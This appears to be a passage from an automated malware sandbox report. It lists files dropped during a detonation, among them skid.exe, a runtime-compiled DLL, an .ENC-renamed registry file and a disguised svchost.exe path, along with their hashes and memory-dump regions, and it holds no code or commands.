694a94c87330209b5e8fd6b2519b2e00

SHA1
89bf38f33a958829cce428f1efe527fdc470dc0f

SHA256
4ff2ec7cb5c59e7bc14f523a2c00612138d8cf5b3d2621337542f839c33e247e

SHA512
992a871cd79ca7686ccfc57a5014de21068ba3c7359acd86471c63cac1ed287084e13e1699ba7aa0ae0d68e52de63569daa8294a1265818c847b79a98021424d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cb0cf19ebeba3256a05065693a1ca866

SHA1
c028aff9b6850c2bdd6673b74037630b4ee2ccd8

SHA256
58e1183323526c135119df281171285d98b5ce05ad00f201ca899cd43358e3fb

SHA512
811606a0c8545eac53127a3687c6b0fde595dd7e958ef11ae650d142d40ac5e86ebbd313dc17dfa86c091ee868dc1c9ed422c2e541c6de3487e0c50c1a3e8fbc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d3e8199b4634731cf0a0c26c1f14f588

SHA1
7f8fae27eb80055a436a6b5457978f32673d9ad4

SHA256
ef33f487f93c2977e92fb08d6bdcc9d48b5d1864c402f9d3fbf3e1b30e8b3b9a

SHA512
806a123100dbc1ca1b27bbad5b93c3a9a840dc795127af8523333a71259a8c5ef8aefccb83ef390f2644e013f138c4b7b63c584acccb197aada0c70c038032e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
15dde0683cd1ca19785d7262f554ba93

SHA1
d039c577e438546d10ac64837b05da480d06bf69

SHA256
d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

SHA512
57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
da5c82b0e070047f7377042d08093ff4

SHA1
89d05987cd60828cca516c5c40c18935c35e8bd3

SHA256
77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

SHA512
7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
67e8893616f805af2411e2f4a1411b2a

SHA1
39bf1e1a0ddf46ce7c136972120f512d92827dcd

SHA256
ca0dfe104c1bf27f7e01999fcdabc16c6400c3da937c832c26bdbca322381d31

SHA512
164e911a9935e75c8be1a6ec3d31199a16ba2a1064da6c09d771b2a38dd7fddd142301ef55d67d90f306d3a454a1ce7b72e129ea42e44500b9b8c623a8d98b4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c1b0a9f26c3e1786191e94e419f1fbf9

SHA1
7f3492f4ec2d93e164f43fe2606b53edcffd8926

SHA256
796649641966f606d7217bb94c5c0a6194eef518815dacc86feacdd78d3c1113

SHA512
fa0290d77372c26a2f14cb9b0002c222bc757ce7ad02516b884c59a1108f42eb4c76884f9edb6c7149f7c3fac917eda99b72a3b1d72b7e118a1d5a73cadd15a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES122B.tmp

Filesize
1KB

MD5
9f985925ffa6cae89703006d1e7989a5

SHA1
2db135a0f20cf15718d9ec46f2eed14c8ba58ef9

SHA256
1b8076572e7243f9930f58cb793c8afdcb28a6abb69a8bb2d45b54cdee968db3

SHA512
47bafda88e72ca7db48a072f336799372ac9b2dead85a1bd7afc8dd8c98c9ee0e588c20b2e4f3d2fa580d0238325bf2c0a2afabca0cb43acf25cf99e49189978

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cd0pm5ds.fmc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\skid.exe

Filesize
229KB

MD5
1adeea63d576dea9add98e01e9fe78b4

SHA1
8f754fd661d9ce2e9e9a7278b4dd7096b13fc585

SHA256
5a2904a05d5d2f5d3d3ef44bdf54e74341ae9b54ba5f6545b37acf187eec4f84

SHA512
0ba3c5555273a15c5406f0bd1b5f1a3888814bdbb4130f80eae1f973497c4e5d81a92ed0797a55316b358a42a955fe44f476d1e0e90c15211dc30f4dd20c58cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\xcca2gx1\xcca2gx1.dll

Filesize
3KB

MD5
3499df9996dd887eff523d571f7d32ee

SHA1
3ea405a7a4fd847be3bdc642cc8abb0d0d6d696c

SHA256
fab0778f28ea285f3df4d7247b27107f389b4a9616f322919a6cead0b1c4a42a

SHA512
93d7e7f2c5eeec449cf02c2bb0a49f4ef45939a4f217f0c829b764a8122f4f3b4eb80f052bde1c129f2fd27e7945af4ebc9587b451473e611ccf0d34455322d4

Download Submit
C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC

Filesize
16B

MD5
d012e5555ae6936cbe76b0edf9b0da69

SHA1
0a80fe68cdd19432d8f4ccae4b505613064f1966

SHA256
7a35c4144ba71bf57b0fe01b116314ff31f3765cd6667c3d48def6fe1c4af861

SHA512
920b93ad09eddab8b03be79bc8813abce6beaa0cbb37ff0a8d85c92c8940ce003bb03d967eaa84d22b01e00aabfab26e16c2d41fb2c56bd60bf08171cb130de6

Download Submit
C:\Windows\System32\svchost‌.exe

Filesize
75KB

MD5
4215e3706e043c0af260e1a19ee77b08

SHA1
fed96918f57562492f5c6c9a4630ffaaedeb587b

SHA256
be9f90f035ff41d59d5579c507eef589daad57aa749128f88df76ca7d858a488

SHA512
38e946bf7692fa9ef6fd078853f2b2e21d3034f43b109c9de86c61020533f8cd557df8721e1b5b6e907762c2e83422a6d98999a109b9876cc6590422d3bb0733

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xcca2gx1\CSC675909DC83D240FB9EE5F94F17C3DD6B.TMP

Filesize
652B

MD5
47b79b2e07bbe68366fde7e4e6cd336c

SHA1
2b02b8f10872a1964b3ca736fc3f80381fda3af8

SHA256
673fc0af869a237a7c9b01a1ecec14c6ba73cf345ffd82f0200b1f36b410c6a8

SHA512
b2b3fb6a98d8f45f78eae7416228059a3da875cdf92bda53b110e47c5653e5e89a92bc1a659e60a8b1512803b101fb7b7bd9bbf0296f98c55b8b4147c360261e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xcca2gx1\xcca2gx1.0.cs

Filesize
260B

MD5
c693814f693e6bcc3e3fc8c329045ebf

SHA1
2a0cb4b246ec0dd4180d3a16336564078eae7a37

SHA256
c8f0ea4dc2b29ed53ac9dbdcf0ce45263a1719a7232b1affdd9825ee0c775651

SHA512
593b5db1257228119d52f46da6bd433c14f23e0cd3414395ad442121f88a703f02352e29b7a38f666844c3a89239c23c54f7002b3ab04682ee74ae1792888d9b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xcca2gx1\xcca2gx1.cmdline

Filesize
369B

MD5
9b4eecb5440a567b41020950f8418812

SHA1
65f45b9c6fac85a3378a689c680e772f97a43202

SHA256
0e8f64a7493ba2ba9454556aa33ccb51742dd826920d190fd74d71b326822e5e

SHA512
6bcf4756e80731452df15bc41627efcd40ac9d4d8c60d4d217f3cedf3dd244a80df7a59ecfa91f34c98c34edc66865257c9347e841db234a2a23f0595928b335

Download Submit
memory/368-44-0x00000000008F0000-0x0000000000936000-memory.dmp

Filesize
280KB

Download
memory/2000-50-0x0000000000480000-0x000000000049A000-memory.dmp

Filesize
104KB

Download
memory/2000-165-0x000000001C9F0000-0x000000001CB76000-memory.dmp

Filesize
1.5MB

Download
memory/2328-194-0x0000000000D30000-0x0000000000D3C000-memory.dmp

Filesize
48KB

Download
memory/2328-388-0x000000001C8C0000-0x000000001CA69000-memory.dmp

Filesize
1.7MB

Download
memory/2328-392-0x000000001C8C0000-0x000000001CA69000-memory.dmp

Filesize
1.7MB

Download
memory/2376-86-0x00000259B33F0000-0x00000259B3466000-memory.dmp

Filesize
472KB

Download
memory/2376-87-0x000002599A8F0000-0x000002599A940000-memory.dmp

Filesize
320KB

Download
memory/2376-134-0x000002599A9B0000-0x000002599A9C2000-memory.dmp

Filesize
72KB

Download
memory/2376-133-0x000002599A980000-0x000002599A98A000-memory.dmp

Filesize
40KB

Download
memory/2376-62-0x0000025998C20000-0x0000025998C60000-memory.dmp

Filesize
256KB

Download
memory/2376-88-0x000002599A960000-0x000002599A97E000-memory.dmp

Filesize
120KB

Download
memory/2956-32-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

Filesize
10.8MB

Download
memory/2956-0-0x00007FFD84573000-0x00007FFD84575000-memory.dmp

Filesize
8KB

Download
memory/2956-99-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

Filesize
10.8MB

Download
memory/2956-101-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

Filesize
10.8MB

Download
memory/2956-30-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

Filesize
10.8MB

Download
memory/2956-29-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

Filesize
10.8MB

Download
memory/2956-28-0x00007FFD84573000-0x00007FFD84575000-memory.dmp

Filesize
8KB

Download
memory/2956-26-0x000000001DBF0000-0x000000001DBF8000-memory.dmp

Filesize
32KB

Download
memory/2956-13-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

Filesize
10.8MB

Download
memory/2956-12-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

Filesize
10.8MB

Download
memory/2956-11-0x000000001BA30000-0x000000001BA52000-memory.dmp

Filesize
136KB

Download
memory/2956-1-0x0000000000DB0000-0x0000000000DCC000-memory.dmp

Filesize
112KB

Download